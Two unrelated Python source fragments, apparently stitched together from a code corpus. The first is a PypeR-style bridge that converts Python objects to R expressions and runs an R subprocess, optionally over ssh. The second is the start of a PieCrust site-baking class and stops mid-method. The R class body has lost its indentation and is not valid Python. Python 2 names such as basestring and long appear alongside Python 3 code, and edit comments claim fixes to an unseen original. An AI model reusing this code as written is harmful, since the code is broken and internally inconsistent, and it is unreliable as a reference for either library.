    elif len(shp) == 2:  # two-dimension array will be converted to matrix
        return('matrix(%s, nrow=%d, byrow=TRUE)' % (getVec(obj), shp[0]))
    else:  # to array
        dim = list(shp[-2:])  # row, col
        dim.extend(shp[-3::-1])
        newaxis = list(range(len(shp)))
        newaxis[-2:] = [len(shp)-1, len(shp)-2]
        return('array(%s, dim=c(%s))' % (getVec(obj.transpose(newaxis)), repr(dim)[1:-1]))
def PandasSerieStr(obj):
    """Convert a pandas Series into a one-column R data.frame named after the Series."""
    values = getVec(obj.values)
    index = getVec(obj.index)
    return('data.frame(%s=%s, row.names=%s)' % (obj.name, values, index))
def PandasDataFrameStr(obj):
    """Convert a pandas DataFrame into an R data.frame expression.

    Columns are rendered as "name"=c(...) pairs and the index becomes
    row.names. The original function contained an unreachable second
    implementation after the return statement; it has been removed.
    """
    # DataFrame will be converted to data.frame, have to explicitly name columns
    s = ', '.join(map(lambda a, b=obj: '"%s"=%s' % (str(a), getVec(obj[a])), obj))
    return('data.frame(%srow.names=%s)' % (s and s + ', ', getVec(obj.index)))
def OtherStr(obj):
    """Fallback conversion: iterables are rendered via SeqStr, everything else via repr.

    NOTE: the original distinguished containers of <= 10000 elements from
    larger ones but applied the identical conversion to both ("waiting for
    better solution for huge-size containers"), so the branches are merged.
    """
    if hasattr(obj, '__iter__'):  # for iterators
        return(SeqStr(list(obj)))
    return(repr(obj))
# Dispatch table mapping exact Python types to their R-conversion functions;
# Str4R consults it first, then falls back to isinstance checks on base_tps.
str_func = {type(None): NoneStr, bool: BoolStr, long: LongStr, int: repr, float: FloatStr, complex: ComplexStr,
    unicode: UniStr, str: repr, list: SeqStr, tuple: SeqStr, set: SeqStr, frozenset: SeqStr, dict: DictStr}  # str will override unicode in Python 3
base_tps = [type(None), bool, int, long, float, complex, str, unicode, list, tuple, set, frozenset, dict]  # use type(None) instead of NoneType since the latter cannot be found in the types module in Python 3
if has_numpy:
    str_func[numpy.ndarray] = NumpyNdarrayStr
    base_tps.append(numpy.ndarray)
if has_pandas:
    str_func.update({pandas.Series: PandasSerieStr, pandas.DataFrame: PandasDataFrameStr})
    base_tps.extend([pandas.Series, pandas.DataFrame])
# Reverse so the isinstance fallback in Str4R tries the most specific types first.
base_tps.reverse()
if _in_py3:
    base_tps.append(bytes)
    str_func[bytes] = ByteStr
def Str4R(obj):
    '''
    convert a Python basic object into an R object in the form of string.
    '''
    # exact-type dispatch for objects known by PypeR
    converter = str_func.get(type(obj))
    if converter is not None:
        return(converter(obj))
    # for objects derived from basic data types
    for base in base_tps:
        if isinstance(obj, base):
            return(str_func[base](obj))
    # for any other objects
    return(OtherStr(obj))
class RError(Exception):
    """Raised when an R expression fails or a value cannot be exchanged with R."""

    def __init__(self, value):
        self.value = value

    def __str__(self):
        return(repr(self.value))
class R(object): # "del r.XXX" fails on FePy-r7 (IronPython 1.1 on .NET 2.0.50727.42) if using old-style class
'''
A Python class to enclose an R process.
'''
__Rfun = r'''.getRvalue4Python__ <- function(x, use_dict=NULL, has_numpy=FALSE, has_pandas=FALSE) {
if (has_pandas) has_numpy <- TRUE
if (has_numpy) {
headstr <- 'numpy.array('
tailstr <- ')' }
else headstr <- tailstr <- ''
SpecialLocs <- function(x) { # find locations of special values: NULL, NA, NaN, Inf
rlt <- list()
if (!has_numpy) {
idx <- which(is.null(x) | is.na(x) | is.nan(x) | is.infinite(x))
if (length(idx) > 0) list$None <- idx
}
else {
idx <- which(is.null(x) | is.na(x))
if (length(idx) > 0) rlt$None <- idx
idx <- which(is.nan(x))
if (length(idx) > 0) rlt$numpy.NaN <- idx
idx <- which(is.infinite(x))
if (length(idx) > 0) {
v <- x[idx]
iidx <- which(v > 0)
if (length(iidx) > 0) rlt$numpy.Inf <- idx[iidx]
iidx <- which(v < 0)
if (length(iidx) > 0) rlt['-numpy.Inf'] <- idx[iidx]
}
}
return(rlt)
}
SpecialVals <- function(x, valoc) {
for (val in names(valoc)) x[valoc[[val]]] <- val
return(x)
}
NullStr <- function(x) 'None'
VectorStr <- function(x) {
#nms <- names(x)
#if (!is.null(nms) && length(nms)>0) return(ListStr(as.list(x)))
complx <- is.complex(x)
special_locs <- SpecialLocs(x)
if (is.character(x)) {
x <- gsub('\\\\', '\\\\\\\\', x)
x <- gsub('"', '\\\\"', x)
x <- paste('"', x, '"', sep='') }
else if (is.logical(x)) x <- ifelse(x, 'True', 'False')
if (length(special_locs) > 0) x <- SpecialVals(x, special_locs)
if (length(x)==1) x <- paste(x) # convert to character using paste, "gettext", or "as.character"
else x <- paste(headstr, '[', paste(x, collapse=','), ']', tailstr, sep='')
if (complx) x <- gsub('i', 'j', x)
return(x) }
MatrixStr <- function(x) {
complx <- is.complex(x)
special_locs <- SpecialLocs(x)
if (is.character(x)) x <- matrix(paste('"', x, '"', sep=''), nrow=nrow(x))
else if (is.logical(x)) x <- ifelse(x, 'True', 'False')
if (length(special_locs) > 0) x <- SpecialVals(x, special_locs)
x <- apply(x, 1, function(r) paste('[', paste(r, collapse=','), ']', sep=''))
x <- paste(headstr, '[', paste(x, collapse=','), ']', tailstr, sep='')
if (complx) x <- gsub('i', 'j', x)
return(x) }
ArrayStr <- function(x) {
complx <- is.complex(x)
ndim <- length(dim(x))
if (ndim == 1) return(VectorStr(x))
if (ndim == 2) return(MatrixStr(x))
# ndim >= 3
if (is.character(x)) x <- array(paste('"', x, '"', sep=''), dim=dim(x))
else if (is.logical(x)) x <- ifelse(x, 'True', 'False')
# do col first
x <- apply(x, seq(dim(x))[-2], function(r) paste('[', paste(r, collapse=','), ']', sep=''))
for (i in seq(ndim-2))
x <- apply(x, seq(dim(x))[-1], function(r) paste('[', paste(r, collapse=','), ']', sep=''))
x <- paste(headstr, '[', paste(x, collapse=','), ']', tailstr, sep='')
if (complx) x <- gsub('i', 'j', x)
return(x) }
DataFrameStr <- function(x) {
if (ncol(x) == 0) {
if (has_pandas) return('pandas.DataFrame()')
if (has_numpy) return('numpy.array([])')
return('[]')}
if (has_numpy) {
cnms <- colnames(x) # get column names
ctp <- list()
for (i in seq(x)) {
xi <- as.vector(x[[i]])
special_locs <- SpecialLocs(xi)
if (is.character(xi)) {
ctp[i] <- sprintf('("%s", "|S%d")', cnms[i], if (length(xi) > 0) max(nchar(xi)) else 0 )
xi <- paste('"', xi, '"', sep='') }
else if (is.logical(xi)) {
xi <- ifelse(xi, 'True', 'False')
ctp[i] <- paste('("', cnms[i], '", "<?")' ) }
else if (is.integer(xi)) {
xi <- paste(xi)
ctp[i] <- paste('("', cnms[i], '", "<q")' ) }
else if (is.double(xi)) {
xi <- paste(xi)
ctp[i] <- paste('("', cnms[i], '", "<g")' ) }
else if (is.complex(xi)) {
xi <- gsub('i', 'j', paste(xi))
ctp[i] <- paste('("', cnms[i], '", "<G")') }
if (length(special_locs) > 0) xi <- SpecialVals(xi, special_locs)
if (nrow(x) > 0) x[[i]] <- xi }
tailstr <- paste(', dtype=[', paste(ctp, collapse=','), ']', tailstr, sep='') }
else if (nrow(x) > 0)
for (i in seq(x)) {
xi <- as.vector(x[[i]])
special_locs <- SpecialLocs(xi)
if (is.character(xi)) xi <- paste('"', xi, '"', sep='')
else if (is.logical(xi)) xi <- ifelse(xi, 'True', 'False')
else if (is.integer(xi)) xi <- paste(xi)
else if (is.double(xi)) xi <- paste(xi)
else if (is.complex(xi)) xi <- gsub('i', 'j', paste(xi))
if (length(special_locs) > 0) xi <- SpecialVals(xi, special_locs)
if (nrow(x) > 0) x[[i]] <- xi }
x <- as.matrix(x)
x <- apply(x, 1, function(r) paste('(', paste(r, collapse=','), if(length(r)<2) ',)' else ')', sep=''))
x <- paste(headstr, '[', paste(x, collapse=','), ']', tailstr, sep='')
if (has_pandas) x <- paste('pandas.DataFrame(', x, ')', sep='')
return(x) }
ListStr <- function(x) {
nms <- names(x) # get column names
x <- sapply(x, Str4Py)
return(zipVecWithName(x, nms))}
zipVecWithName <- function(x, nms) {
if (!is.null(nms) && length(nms)>0) {
nms <- paste('"', nms, '"', sep='')
x <- sapply(seq(nms), function(i) paste('(', nms[i], ',', x[i], ')') )
if (identical(use_dict, TRUE)) x <- paste('dict([', paste(x, collapse=','), '])', sep='')
else if (identical(use_dict, FALSE)) x <- paste('[', paste(x, collapse=','), ']', sep='')
else { # should be NULL or something else
if (any(duplicated(nms))) x <- paste('[', paste(x, collapse=','), ']', sep='')
else x <- paste('dict([', paste(x, collapse=','), '])', sep='') } }
else x <- paste('[', paste(x, collapse=','), ']', sep='')
return(x) }
Str4Py <- function(x) {
# no considering on NA, Inf, ...
# use is.XXX, typeof, class, mode, storage.mode, sprintf
if (is.factor(x)) x <- as.vector(x)
rlt <- {
if (is.null(x)) NullStr(x)
else if (is.vector(x) && !is.list(x)) VectorStr(x)
else if (is.matrix(x) || is.array(x)) ArrayStr(x)
else if (is.data.frame(x)) DataFrameStr(x)
else if (is.list(x)) ListStr(x)
else Str4Py(as.character(x)) } # other objects will be convert to character (instead of NullStr), or use "gettext"
return(rlt) }
Str4Py(x) }
# initalize library path for TCL/TK based environment on Windows, e.g. Python IDLE
.addLibs <- function() {
ruser <- Sys.getenv('R_USER')
userpath <- Sys.getenv('R_LIBS_USER')
libpaths <- .libPaths()
for (apath in userpath) {
if (length(grep(apath, libpaths)) > 0) next
if (file.exists(apath)) .libPaths(apath)
else {
d <- '/Documents'
if (substr(ruser, nchar(ruser)-nchar(d)+1, nchar(ruser)) != d) {
apath <- paste(ruser,d, substr(apath, nchar(ruser)+1, nchar(apath)), sep='')
if (file.exists(apath)) .libPaths(apath)} } } }
if(identical(.Platform$OS.type, 'windows')) .addLibs()
rm(.addLibs)
'''
_DEBUG_MODE = True
def __init__(self, RCMD='R', max_len=1000, use_numpy=True, use_pandas=True, use_dict=None,
host='localhost', user=None, ssh='ssh', return_err=True, dump_stdout=False):
'''
RCMD: The name of a R interpreter, path information should be included
if it is not in the system search path.
use_numpy: Used as a boolean value. A False value will disable numpy
even if it has been imported.
use_pandas: Used as a boolean value. A False value will disable pandas
even if it has been imported.
use_dict: A R named list will be returned as a Python dictionary if
"use_dict" is True, or a list of tuples (name, value) if "use_dict"
is False. If "use_dict" is None, the return value will be a
dictionary if there is no replicated names, or a list if replicated
names found.
host: The computer name (or IP) on which the R interpreter is
installed. The value "localhost" means that R locates on the the
localhost computer. On POSIX systems (including Cygwin environment
on Windows), it is possible to use R on a remote computer if the
command "ssh" works. To do that, the user needs to set this value,
and perhaps the parameter "user".
user: The user name on the remote computer. This value needs to be set
only if the user name on the remote computer is different from the
local user. In interactive environment, the password can be input
by the user if prompted. If running in a program, the user needs to
be able to login without typing password!
ssh: The program to login to remote computer.
return_err: redirect stderr to stdout
dump_stdout:
prints output from R directly to sys.stdout, useful for long running
routines which print progress during execution.
'''
# use self.__dict__.update to register variables since __setattr__ is
# used to set variables for R. tried to define __setattr in the class,
# and change it to __setattr__ for instances at the end of __init__,
# but it seems failed.
# -- maybe this only failed in Python2.5? as warned at
# http://wiki.python.org/moin/NewClassVsClassicClass:
# "Warning: In 2.5, magic names (typically those with a double
# underscore (DunderAlias) at both ends of the name) may look at the
# class rather than the instance even for old-style classes."
self.__dict__.update({'prog': None,
'has_numpy': use_numpy and has_numpy,
'has_pandas': use_pandas and has_pandas,
'Rfun': self.__class__.__Rfun,
'max_len': max_len,
'use_dict': use_dict,
'dump_stdout': dump_stdout,
'localhost': host == 'localhost',
'newline': sys.platform == 'win32' and '\r\n' or '\n',
'sendAll' : sendAll # keep a reference to the global function "sendAll" which will be used by __del__
})
RCMD = [RCMD] #shlex.split(RCMD) - shlex do not work properly on Windows! #re.split(r'\s', RCMD)
if not self.localhost:
RCMD.insert(0, host)
if user:
RCMD.insert(0, '-l%s' % user)
RCMD.insert(0, ssh)
# args = ('--vanilla',) # equal to --no-save, --no-restore, --no-site-file, --no-init-file and --no-environ
args = ('--quiet', '--no-save', '--no-restore') # "--slave" cannot be used on Windows!
for arg in args:
if arg not in RCMD:
RCMD.append(arg)
if _has_subp and hasattr(subprocess, 'STARTUPINFO'):
info = subprocess.STARTUPINFO()
try:
if hasattr(subprocess, '_subprocess'):
info.dwFlags |= subprocess._subprocess.STARTF_USESHOWWINDOW
info.wShowWindow = subprocess._subprocess.SW_HIDE
else:
info.dwFlags |= subprocess.STARTF_USESHOWWINDOW
info.wShowWindow = subprocess.SW_HIDE
except:
info = None
else:
info = None
# create stderr to replace None for py2exe:
# http://www.py2exe.org/index.cgi/Py2ExeSubprocessInteractions
if sys.platform != 'win32':
childstderr = None
else:
if hasattr(sys.stderr, 'fileno'):
childstderr = sys.stderr
elif hasattr(sys.stderr, '_file') and hasattr(sys.stderr._file, 'fileno'):
childstderr = sys.stderr._file
else: # Give up and point child stderr at nul
childstderr = file('nul', 'a')
self.__dict__['prog'] = Popen(RCMD, stdin=PIPE, stdout=PIPE, stderr=return_err and _STDOUT or childstderr, startupinfo=info)
self.__call__(self.Rfun)
def __runOnce(self, CMD, use_try=None):
'''
CMD: a R command string
'''
use_try = use_try or self._DEBUG_MODE
newline = self.newline
tail_token = 'R command at time: %s' % repr(time.time())
# tail_token_r = re.sub(r'[\(\)\.]', r'\\\1', tail_token)
tail_cmd = 'print("%s")%s' % (tail_token, newline)
tail_token = tail_token.replace(' ', '\\s').replace('.', '\\.').replace('+', '\\+')
re_tail = re.compile(r'>\sprint\("%s"\)\r?\n\[1\]\s"%s"\r?\n$' % (tail_token, tail_token))
if len(CMD) <= self.max_len or not self.localhost:
fn = None
CMD = (use_try and 'try({%s})%s%s' or '%s%s%s') % (CMD.replace('\\', '\\\\'), newline, tail_cmd)
else:
fh, fn = tempfile.mkstemp()
os.fdopen(fh, 'wb').write(_mybytes(CMD))
if sys.platform == 'cli':
os.close(fh) # this is necessary on IronPython
fn = fn.replace('\\', '/')
CMD = (use_try and 'try({source("%s")})%sfile.remove(%r)%s%s' or '%s%s%s') % (fn, newline, fn, newline, tail_cmd)
self.sendAll(self.prog, CMD)
rlt = ''
while not re_tail.search(rlt):
try:
rltonce = readLine(self.prog, dump_stdout=self.dump_stdout)
if rltonce:
rlt = rlt + rltonce
except:
break
else:
rlt = re_tail.sub('', rlt)
if rlt.startswith('> '):
rlt = rlt[2:]
# if fn is not None: os.unlink(fn)
return(rlt)
def __call__(self, CMDS=[], use_try=None):
'''
Run a (list of) R command(s), and return the output message from the STDOUT of R.
CMDS: an R command string or a list of R commands
'''
rlt = []
if isinstance(CMDS, basestring): # a single command
rlt.append(self.__runOnce(CMDS, use_try=use_try))
else: # should be a list of commands
# for CMD in CMDS:
# rlt.append(self.__runOnce(CMD, use_try=use_try))
rlt.append(self.__runOnce('; '.join(CMDS), use_try=use_try)) # now, ['sink("output.txt")', ..., 'sink()'] is allowed!
if len(rlt) == 1:
rlt = rlt[0]
return(rlt)
def __getitem__(self, obj, use_try=None, use_dict=None): # to model a dict: "r['XXX']"
'''
Get the value of an R variable or expression. The return value is
converted to the corresponding Python object.
obj: a string - the name of an R variable, or an R expression
use_try: use "try" function to wrap the R expression. This can avoid R
crashing if the obj does not exist in R.
use_dict: named list will be returned a dict if use_dict is True,
otherwise it will be a list of tuples (name, value)
'''
if obj.startswith('_'):
raise RError('Leading underscore ("_") is not permitted in R variable names!')
use_try = use_try or self._DEBUG_MODE
if use_dict is None:
use_dict = self.use_dict
cmd = '.getRvalue4Python__(%s, use_dict=%s, has_numpy=%s, has_pandas=%s)' % (obj, use_dict is None and 'NULL' or use_dict and 'TRUE' or 'FALSE', self.has_numpy and 'TRUE' or 'FALSE', self.has_pandas and 'TRUE' or 'FALSE')
rlt = self.__call__(cmd, use_try=use_try)
head = (use_try and 'try({%s})%s[1] ' or '%s%s[1] ') % (cmd, self.newline)
# sometimes (e.g. after "library(fastICA)") the R on Windows uses '\n' instead of '\r\n'
head = rlt.startswith(head) and len(head) or len(head) - 1
tail = rlt.endswith(self.newline) and len(rlt) - len(self.newline) or len(rlt) - len(self.newline) + 1 # - len('"')
try:
rlt = eval(eval(rlt[head:tail])) # The inner eval remove quotes and recover escaped characters.
except:
raise RError(rlt)
return(rlt)
def __setitem__(self, obj, val): # to model a dict: "r['XXX'] = YYY"
'''
Assign a value (val) to an R variable (obj).
obj: a string - the name of an R variable
val: a python object - the value to be passed to an R object
'''
if obj.startswith('_'):
raise RError('Leading underscore ("_") is not permitted in R variable names!')
self.__call__('%s <- %s' % (obj, Str4R(val)))
def __delitem__(self, obj): # to model a dict: "del r['XXX']"
if obj.startswith('_'):
raise RError('Leading underscore ("_") is not permitted in R variable names!')
self.__call__('rm(%s)' % obj)
def __del__(self): # to model "del r"
if self.prog:
try:
self.sendAll(self.prog, 'q("no")'+self.newline)
except:
pass
self.prog = None
def __getattr__(self, obj, use_dict=None):  # to model object attribute: "r.XXX"
    """Fetch an R variable via attribute access: r.x.

    Only invoked when normal attribute lookup fails, so instance and class
    attributes are still checked first before falling back to R.
    obj: a string - the name of an R variable.
    use_dict: a named R list is returned as a dict if True, as a list of
        (name, value) tuples if False; if None, self.use_dict is used.
    """
    if obj in self.__dict__:
        return self.__dict__[obj]
    if obj in self.__class__.__dict__:
        return self.__class__.__dict__[obj]
    if use_dict is None:
        use_dict = self.use_dict
    # Any error raised while talking to R propagates unchanged to the caller.
    return self.__getitem__(obj, use_dict=use_dict)
def __setattr__(self, obj, val):  # to model object attribute: "r.XXX = YYY"
    """Assign via attribute access: r.x = y.

    Names that already exist as instance or class attributes are stored
    locally; anything else is forwarded to R as a variable assignment.
    """
    is_local = obj in self.__dict__ or obj in self.__class__.__dict__
    if not is_local:
        self.__setitem__(obj, val)
    else:
        self.__dict__[obj] = val
def __delattr__(self, obj):  # to model object attribute: "del r.XXX"
    """Delete via attribute access: del r.x (local attribute or R variable)."""
    if obj not in self.__dict__:
        self.__delitem__(obj)
    else:
        del self.__dict__[obj]
def get(self, obj, default=None, use_dict=None):  # to model a dict: "r.get('XXX', 'YYY')"
    """Dict-style access with a fallback: r.get('x', default).

    obj: a string - the name of an R variable, or an R expression.
    default: value returned when the object cannot be fetched from R.
    use_dict: a named R list is returned as a dict if True, as a list of
        (name, value) tuples if False; if None, self.use_dict is used.
    """
    try:
        return self.__getitem__(obj, use_try=True, use_dict=use_dict)
    except Exception:
        # Mirror dict.get: any failure to fetch yields the default. The
        # original used a bare "except:" (which also swallowed
        # KeyboardInterrupt/SystemExit) around a dead "if True:" branch.
        return default
# Verb-style aliases so the object can also be driven as
# r.run(...), r.assign(name, val), r.remove(name).
run, assign, remove = __call__, __setitem__, __delitem__
# for a single-round duty:
def runR(CMDS, Robj='R', max_len=1000, use_numpy=True, use_pandas=True, use_dict=None, host='localhost', user=None, ssh='ssh', dump_stdout=False):
    '''
    Run a (list of) R command(s), and return the output from the STDOUT.
    CMDS: a R command string or a list of R commands.
    Robj: can be a shell command (like /usr/bin/R), or the R class.
    max_len: define the upper limitation for the length of command string. A
        command string will be passed to R by a temporary file if it is longer
        than this value.
    use_numpy: Used as a boolean value. A False value will disable numpy even
        if it has been imported.
    use_pandas: Used as a boolean value. A False value will disable pandas even
        if it has been imported.
    use_dict: named list will be returned a dict if use_dict is True, otherwise
        it will be a list of tuples (name, value).
    host: The computer name (or IP) on which the R interpreter is
        installed. The value "localhost" means that the R locates on the
        the localhost computer. On POSIX systems (including Cygwin
        environment on Windows), it is possible to use R on a remote
        computer if the command "ssh" works. To do that, the user need set
        this value, and perhaps the parameter "user".
    user: The user name on the remote computer. This value need to be set
        only if the user name is different on the remote computer. In
        interactive environment, the password can be input by the user if
        prompted. If running in a program, the user need to be able to
        login without typing password!
    ssh: The program to login to remote computer.
    dump_stdout: forwarded to the R constructor; was previously referenced
        without being defined, raising NameError whenever Robj was a string.
    '''
    # Fixed: "basestring" is Python-2-only; use str (NameError on Python 3).
    if isinstance(Robj, str):
        Robj = R(RCMD=Robj, max_len=max_len, use_numpy=use_numpy, use_pandas=use_pandas, use_dict=use_dict, host=host, user=user, ssh=ssh, dump_stdout=dump_stdout)
    rlt = Robj.run(CMDS=CMDS)
    # Unwrap single-command results for convenience.
    if len(rlt) == 1:
        rlt = rlt[0]
    return rlt
|
<gh_stars>10-100
import time
import os.path
import hashlib
import logging
from piecrust.chefutil import (
format_timed_scope, format_timed)
from piecrust.environment import ExecutionStats
from piecrust.pipelines.base import (
PipelineJobCreateContext, PipelineJobResultHandleContext, PipelineManager,
get_pipeline_name_for_source)
from piecrust.pipelines.records import (
MultiRecordHistory, MultiRecord,
load_records)
from piecrust.sources.base import REALM_USER, REALM_THEME, REALM_NAMES
logger = logging.getLogger(__name__)
def get_bake_records_path(app, out_dir, *, suffix=''):
    """Return the cache path of the bake-records file for a given output dir.

    The file name is derived from an MD5 digest of the output directory so
    that each bake target gets its own records file.
    """
    digest = hashlib.md5(out_dir.encode('utf8')).hexdigest()
    baker_cache = app.cache.getCache('baker')
    return baker_cache.getCachePath('%s%s.records' % (digest, suffix))
class Baker(object):
    """Orchestrates a full site bake into an output directory.

    Ties together the content pipelines, the bake records (used to make
    bakes incremental) and the worker pool that executes bake jobs.
    """
    def __init__(self, appfactory, app, out_dir, *,
                 force=False,
                 allowed_pipelines=None,
                 forbidden_pipelines=None,
                 allowed_sources=None,
                 rotate_bake_records=True,
                 keep_unused_records=False):
        # appfactory: used by worker processes to re-create the app.
        self.appfactory = appfactory
        self.app = app
        self.out_dir = out_dir
        # force: when True, ignore previous bake records and re-bake everything.
        self.force = force
        # Optional allow/deny lists of pipeline names and source names.
        self.allowed_pipelines = allowed_pipelines
        self.forbidden_pipelines = forbidden_pipelines
        self.allowed_sources = allowed_sources
        self.rotate_bake_records = rotate_bake_records
        self.keep_unused_records = keep_unused_records

    def bake(self):
        """Run the whole bake and return the current bake records."""
        start_time = time.perf_counter()

        # Setup baker.
        logger.debug(" Bake Output: %s" % self.out_dir)
        logger.debug(" Root URL: %s" % self.app.config.get('site/root'))

        # Get into bake mode.
        self.app.config.set('baker/is_baking', True)
        self.app.config.set('site/asset_url_format', '%page_uri%/%filename%')

        stats = self.app.env.stats
        stats.registerTimer('LoadSourceContents', raise_if_registered=False)
        stats.registerTimer('CacheTemplates', raise_if_registered=False)

        # Make sure the output directory exists.
        if not os.path.isdir(self.out_dir):
            os.makedirs(self.out_dir, 0o755)

        # Load/create the bake records.
        records_path = get_bake_records_path(
            self.app, self.out_dir)
        if not self.force and os.path.isfile(records_path):
            with format_timed_scope(logger, "loaded previous bake records",
                                    level=logging.DEBUG, colored=False):
                previous_records = load_records(records_path)
        else:
            previous_records = MultiRecord()
        current_records = MultiRecord()

        # Figure out if we need to clean the cache because important things
        # have changed.
        is_cache_valid = self._handleCacheValidity(previous_records,
                                                   current_records)
        if not is_cache_valid:
            previous_records = MultiRecord()

        # Create the bake records history which tracks what's up-to-date
        # or not since last time we baked to the given output folder.
        record_histories = MultiRecordHistory(
            previous_records, current_records)

        # Pre-create all caches.
        for cache_name in ['app', 'baker', 'pages', 'renders']:
            self.app.cache.getCache(cache_name)

        # Create the pipelines.
        ppmngr = self._createPipelineManager(record_histories)

        # Done with all the setup, let's start the actual work.
        logger.info(format_timed(start_time, "setup baker"))

        # Load all sources, pre-cache templates.
        load_start_time = time.perf_counter()
        self._populateTemplateCaches()
        logger.info(format_timed(load_start_time, "cache templates"))

        # Create the worker processes.
        pool_userdata = _PoolUserData(self, ppmngr)
        pool = self._createWorkerPool(records_path, pool_userdata)

        # Bake the realms.
        self._bakeRealms(pool, ppmngr, record_histories)

        # Handle deletions, collapse records, etc.
        ppmngr.postJobRun()
        ppmngr.deleteStaleOutputs()
        ppmngr.collapseRecords(self.keep_unused_records)

        # All done with the workers. Close the pool and get reports.
        pool_stats = pool.close()
        current_records.stats = _merge_execution_stats(stats, *pool_stats)

        # Shutdown the pipelines.
        ppmngr.shutdownPipelines()

        # Backup previous records, save the current ones.
        current_records.bake_time = time.time()
        current_records.out_dir = self.out_dir
        _save_bake_records(current_records, records_path,
                           rotate_previous=self.rotate_bake_records)

        # All done.
        self.app.config.set('baker/is_baking', False)
        logger.debug(format_timed(start_time, 'done baking'))

        return current_records

    def _handleCacheValidity(self, previous_records, current_records):
        """Decide whether caches/records from the last bake can be reused.

        Returns True for an incremental bake, False when everything must be
        re-baked from scratch (caches are cleared here in that case).
        """
        start_time = time.perf_counter()

        reason = None
        if self.force:
            reason = "ordered to"
        elif not self.app.config.get('__cache_valid'):
            # The configuration file was changed, or we're running a new
            # version of the app.
            reason = "not valid anymore"
        elif previous_records.invalidated:
            # We have no valid previous bake records.
            reason = "need bake records regeneration"
        else:
            # Check if any template has changed since the last bake. Since
            # there could be some advanced conditional logic going on, we'd
            # better just force a bake from scratch if that's the case.
            max_time = 0
            for d in self.app.templates_dirs:
                for dpath, _, filenames in os.walk(d):
                    for fn in filenames:
                        full_fn = os.path.join(dpath, fn)
                        max_time = max(max_time, os.path.getmtime(full_fn))
            if max_time >= previous_records.bake_time:
                reason = "templates modified"

        if reason is not None:
            # We have to bake everything from scratch.
            self.app.cache.clearCaches(except_names=['app', 'baker'])
            self.force = True
            current_records.incremental_count = 0
            previous_records = MultiRecord()
            logger.debug(format_timed(
                start_time, "cleaned cache (reason: %s)" % reason,
                colored=False))
            return False
        else:
            current_records.incremental_count += 1
            logger.debug(format_timed(
                start_time, "cache is assumed valid", colored=False))
            return True

    def _createPipelineManager(self, record_histories):
        """Create a PipelineManager with one pipeline per (allowed) source."""
        # Gather all sources by realm -- we're going to bake each realm
        # separately so we can handle "overriding" (i.e. one realm overrides
        # another realm's pages, like the user realm overriding the theme
        # realm).
        #
        # Also, create and initialize each pipeline for each source.
        has_any_pp = False
        ppmngr = PipelineManager(
            self.app, self.out_dir,
            record_histories=record_histories)
        ok_pp = self.allowed_pipelines
        nok_pp = self.forbidden_pipelines
        ok_src = self.allowed_sources
        for source in self.app.sources:
            # Apply the source/pipeline allow- and deny-lists.
            if ok_src is not None and source.name not in ok_src:
                continue
            pname = get_pipeline_name_for_source(source)
            if ok_pp is not None and pname not in ok_pp:
                continue
            if nok_pp is not None and pname in nok_pp:
                continue
            ppinfo = ppmngr.createPipeline(source)
            logger.debug(
                "Created pipeline '%s' for source: %s" %
                (ppinfo.pipeline.PIPELINE_NAME, source.name))
            has_any_pp = True
        if not has_any_pp:
            raise Exception("The website has no content sources, or the bake "
                            "command was invoked with all pipelines filtered "
                            "out. There's nothing to do.")
        return ppmngr

    def _populateTemplateCaches(self):
        """Pre-cache templates for the site's default template engine."""
        engine_name = self.app.config.get('site/default_template_engine')
        for engine in self.app.plugin_loader.getTemplateEngines():
            if engine_name in engine.ENGINE_NAMES:
                engine.populateCache()
                break

    def _bakeRealms(self, pool, ppmngr, record_histories):
        """Queue and run bake jobs for every pipeline pass and realm."""
        # Bake the realms -- user first, theme second, so that a user item
        # can override a theme item.
        # Do this for as many times as we have pipeline passes left to do.
        realm_list = [REALM_USER, REALM_THEME]
        pp_by_pass_and_realm = _get_pipeline_infos_by_pass_and_realm(
            ppmngr.getPipelineInfos())

        for pp_pass_num in sorted(pp_by_pass_and_realm.keys()):
            logger.debug("Pipelines pass %d" % pp_pass_num)
            pp_by_realm = pp_by_pass_and_realm[pp_pass_num]
            for realm in realm_list:
                pplist = pp_by_realm.get(realm)
                if pplist is not None:
                    self._bakeRealm(pool, ppmngr, record_histories,
                                    pp_pass_num, realm, pplist)

    def _bakeRealm(self, pool, ppmngr, record_histories,
                   pp_pass_num, realm, pplist):
        """Create and queue jobs for all pipelines of one realm/pass, then wait."""
        start_time = time.perf_counter()

        job_count = 0
        job_descs = {}
        realm_name = REALM_NAMES[realm].lower()
        # Workers need to know which pass the incoming jobs belong to.
        pool.userdata.cur_pass = pp_pass_num

        for ppinfo in pplist:
            src = ppinfo.source
            pp = ppinfo.pipeline
            jcctx = PipelineJobCreateContext(pp_pass_num, pp.record_name,
                                             record_histories)

            jobs, job_desc = pp.createJobs(jcctx)
            if jobs is not None:
                new_job_count = len(jobs)
                job_count += new_job_count
                pool.queueJobs(jobs)
                if job_desc:
                    job_descs.setdefault(job_desc, []).append(src.name)
            else:
                new_job_count = 0

            logger.debug(
                "Queued %d jobs for source '%s' using pipeline '%s' "
                "(%s)." %
                (new_job_count, src.name, pp.PIPELINE_NAME, realm_name))

        if job_count == 0:
            logger.debug("No jobs queued! Bailing out of this bake pass.")
            return

        # Block until all queued jobs for this pass are done.
        pool.wait()

        logger.info(format_timed(
            start_time, "%d jobs completed (%s)." %
            (job_count, ', '.join(
                ['%s %s' % (d, ', '.join(sn))
                 for d, sn in job_descs.items()]))))

    def _logErrors(self, item_spec, errors):
        """Log a list of bake errors for one content item."""
        logger.error("Errors found in %s:" % item_spec)
        for e in errors:
            logger.error("  " + e)

    def _logWorkerException(self, item_spec, exc_data):
        """Log an exception raised inside a worker process."""
        logger.error("Errors found in %s:" % item_spec)
        logger.error(exc_data['value'])
        if self.app.debug:
            logger.error(exc_data['traceback'])

    def _createWorkerPool(self, previous_records_path, pool_userdata):
        """Build the multi-process worker pool used to execute bake jobs."""
        from piecrust.workerpool import WorkerPool
        from piecrust.baking.worker import BakeWorkerContext, BakeWorker

        worker_count = self.app.config.get('baker/workers')
        batch_size = self.app.config.get('baker/batch_size')

        ctx = BakeWorkerContext(
            self.appfactory,
            self.out_dir,
            force=self.force,
            previous_records_path=previous_records_path,
            allowed_pipelines=self.allowed_pipelines,
            forbidden_pipelines=self.forbidden_pipelines)
        pool = WorkerPool(
            worker_count=worker_count,
            batch_size=batch_size,
            worker_class=BakeWorker,
            initargs=(ctx,),
            callback=self._handleWorkerResult,
            error_callback=self._handleWorkerError,
            userdata=pool_userdata)
        return pool

    def _handleWorkerResult(self, job, res, userdata):
        """Pool callback: let the owning pipeline fold a job result into its record."""
        cur_pass = userdata.cur_pass
